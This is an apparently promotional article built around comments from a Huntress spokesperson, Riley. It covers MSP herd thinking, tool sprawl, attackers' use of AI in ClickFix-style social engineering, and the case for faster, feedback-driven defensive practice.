Cybersecurity is increasingly shaped by alert overload, misconfigurations, and fast-moving threats that outpace response. Huntress positions itself as a security company focused on simplifying how MSPs detect and respond to real-world risk by surfacing actionable threats rather than adding to the noise.
Originally built for endpoint detection in underserved environments, it has expanded into identity and human risk as attacks have shifted. Huntress’ platform integrates with existing MSP tools and is supported by a 24/7 human‑led, AI‑centric SOC, enabling partners to investigate and respond without large in-house security teams.
Rather than competing on dashboards or feature sets, Huntress focuses on interpretation and response, helping MSPs prioritise the risks that matter most.
When best practice becomes copy-paste security
Riley argues that herd thinking in cybersecurity is most visible in how MSPs design their security portfolios. Tooling decisions, he suggests, are driven less by adversary behaviour or organisational risk and more by peer adoption, vendor packaging, and prevailing notions of “best practice” in the market. This produces a high degree of convergence: similar Microsoft SKUs, similar security add-ons, and service catalogues that are largely interchangeable across providers.
He extends this point to the security stack itself, where MSPs frequently accumulate layers of tools under the assumption that more products equate to more protection. In practice, this often produces the opposite effect: fragmented visibility, excessive alert volume, and systems that are technically deployed but operationally underused. A strong toolset does not necessarily translate into a strong security posture when no one has the capacity to monitor or act on what those tools generate.
Riley argues that this pattern is structural in MSP behaviour: “The security stack obsession is the clearest symptom. MSPs bolt product after product onto the pile, convinced that more tools equals more security. It doesn't. It means more dashboards nobody monitors, more alerts nobody has time to triage, and more configuration nobody ever finishes. You can have world-class tooling and a fundamentally weak posture. Most do. The stack is the most visible form of herd behaviour: if every other MSP is buying it, buying it must be what good looks like.”
Over time, this creates a form of structural sameness across the industry. Different vendors and branding on the surface mask very similar blind spots underneath. Rather than optimising around how attackers operate, many MSPs inadvertently optimise around how other MSPs configure their environments, turning “best practice” into a shared ceiling rather than a differentiator.
The AI arms race is mostly one-sided
Riley frames today’s cybersecurity discourse as an “AI arms race” between defenders and attackers, but argues that this framing sits more at the narrative layer than in day-to-day defensive reality. From his perspective, attackers are already operating with AI as a default capability rather than a future advantage.
Recent activity patterns reinforce this shift. Techniques such as ClickFix surged in late 2025 not because they are technically complex, but because they are operationally efficient. Instead of traditional phishing that prompts users to download malicious files, attackers increasingly direct victims to “fix” issues by executing commands already present on their systems. The exploit is behavioural as much as technical, targeting users’ instinct to resolve problems quickly. AI amplifies this by generating scripts in seconds, localising language, and scaling tailored social engineering. What once required skilled operators can now be produced almost instantly and at minimal cost.
By early 2026, variants pushed this further by manufacturing the problem itself, deliberately destabilising browser sessions so that attacker instructions appear as the logical remedy. The pattern is consistent in Riley’s analysis: attackers are no longer just delivering lures but engineering urgency.
Telemetry reinforces this acceleration. Microsoft’s 2025 State of Cybersecurity reports lateral movement occurring in as little as 48 minutes, with some observed cases as fast as 51 seconds. Combined with dwell times now measured in roughly 10 to 12 days, the data points to increasingly automated and tightly orchestrated intrusion chains.
As Riley observes from his work tracking these patterns: “Attackers are getting in and out exponentially faster than before. Calling it an arms race probably flatters the defensive side. Attackers are the ones actually running. They have operationalised AI across phishing, scripting, reconnaissance, and lateral movement.”
Seen in this light, the “arms race” framing becomes uneven. Attackers are already operationalising AI across multiple stages of the intrusion lifecycle, while many defensive environments, particularly in the MSP space, remain structured around reacting after activity occurs. The result is less a race between equals, and more a widening gap between attacker velocity and defensive response.
Innovation or iteration in disguise
Riley’s take on the managed service provider (MSP) channel is that what often gets labelled as innovation is usually just optimisation within the same underlying framework. Incremental automation, slightly improved bundles, and extra layers on top of familiar Microsoft-centric stacks are framed as progress, but in his view, they rarely amount to anything fundamentally new.
The structure underneath stays remarkably stable. Tools evolve, complexity increases, and new features are added, but the operating model itself barely shifts: manage more systems, add more controls, and present that accumulation as advancement. Riley’s point is that this creates a kind of “surface-level sophistication”, where things look more advanced without really changing what the business is responsible for, or how it is held accountable.
As he explains it, drawing a sharper line between refinement and real change: “A bit more automation, a marginally better bundle, another layer on the same Microsoft stack, that’s refinement. Real innovation would be when a partner changes what they’re accountable for. Shifting from ‘we manage your tools’ to ‘we own your identity risk posture and we’ll prove it with metrics and enforced controls.’ That’s a different business, not a better version of the same one.”
Riley frames it almost as a test. If something called “innovation” doesn’t require changes to operations, incentives, SLAs, or how success is measured, then it isn’t transformation at all, just optimisation with better branding.
The case for controlled risk in defence
Cybersecurity defenders operate under constraints attackers do not, balancing security with user experience and accountability. Attackers, by contrast, only need to make their approach work. That imbalance creates a structural disadvantage and shapes how risk is treated on the defensive side.
Within this context, “healthy” risk-taking is not about recklessness, but about designing for controlled impact rather than avoiding impact altogether. That includes canary deployments, pilot groups, reversible changes, and scoped experiments. It also means accepting that inaction can sometimes represent the greater risk.
Riley’s view is that defenders often default to “do nothing” as the safest option, even when it increases exposure. In his analysis, the alternative is a bias towards faster, smaller decisions that prioritise containment and learning over delay.
He points to Huntress’ response during the Railway campaign as an example. When faced with an active credential theft campaign, the team deployed a protective Conditional Access control across ITDR partners, with safeguards and reversibility built in. While some customers preferred more notice, the move reflects a decision model built around acting in real-time while constraining downside risk. Riley argues that in fast-moving intrusion scenarios like this, attackers do not need especially sophisticated techniques. They just need defenders to move slower than the threat.
The AI gap that actually matters
Riley argues that the biggest gap between AI capability and how MSPs and security vendors are using it is not in threat detection or attack sophistication, but in operational execution. Despite the focus on AI-powered attackers, most breaches still come down to familiar fundamentals. AI has not changed the core techniques; it has just made them faster, cheaper, and easier to scale.
Riley points to the same issues across large environments: weak or reused passwords, inconsistent MFA adoption, legacy authentication still enabled, excessive privileges, and stale accounts left in place. These are not tool gaps. In most cases, the tooling already exists, it is simply not applied consistently.
That gap is reinforced by how MSP services are structured. Identity hardening and basic hygiene are still often treated as optional workstreams rather than baseline requirements, even though breaches rarely respect those boundaries.
He also highlights the operational pressure MSPs operate under, from support queues to billing and service delivery. This is where AI has the most immediate value. As he puts it, "That’s exactly where they should be leaning harder on AI: to chew through operational noise like ticket triage, knowledge base lookups, report drafting, and billing workflows so they can win back focus time to sit with clients and actually get them to a more resilient place."
The result is a mismatch: AI is often used to improve communication, while attackers use it to scale familiar techniques like phishing and password spraying. Until AI is directed more deliberately at operational and hygiene gaps, defenders will continue to fall behind on the fundamentals.
Moving beyond herd-driven detection and response
A herd-driven security model emerges when MSPs standardise on the same stacks and frameworks and measure success by alignment rather than outcomes. Environments start to look identical, controls get duplicated, and the end result is often more noise than clarity.
Huntress takes a different approach. Detection is only the starting point. Every alert is routed through a 24/7 human‑led, AI‑centric SOC where analysts focus on real attacker behaviour and turn signals into decisions, not extra workload.
AI is used to help them investigate, correlate, and communicate faster by summarising data and connecting related activity, but final judgement stays with humans. That balance is intentional, especially as AI adoption in the market often increases alert fatigue rather than reducing it.
Riley states that one of the key advantages is feedback. Insights from attacks across the customer base feed directly into detections and response playbooks, improving accuracy over time. Riley describes it simply: “For MSPs, that means less time acting like an alert-clearing shop and more time delivering measurable security value to customers.”
This approach extends into prevention through Managed ISPM and Managed ESPM, shifting focus earlier to misconfigurations and excessive permissions so issues are addressed before they become incidents.
What will separate effective defenders in the coming years
Looking ahead, the real gap between strong and weak defenders will not be technology. It will be how fast organisations learn and adapt compared to attackers.
Riley points to Black Box Thinking by Matthew Syed and the contrast between aviation and medicine. Aviation became safer because it built tight feedback loops where every incident and near-miss is captured, analysed, and fed back into the system. Medicine, for much of its history, kept learning more local, slower, and less systematic.
Cybersecurity in the MSP model still often looks closer to that second pattern. Incidents get resolved, tickets close, and the learning rarely travels far enough to prevent repeat issues elsewhere.
The organisations that pull ahead will behave more like aviation. Every incident improves detections, sharpens controls, and updates playbooks. Near-misses become inputs, not afterthoughts.
Technology and AI will matter, but they are not the differentiator. The real edge will come from breaking herd thinking and building systems that continuously learn faster than attackers evolve.
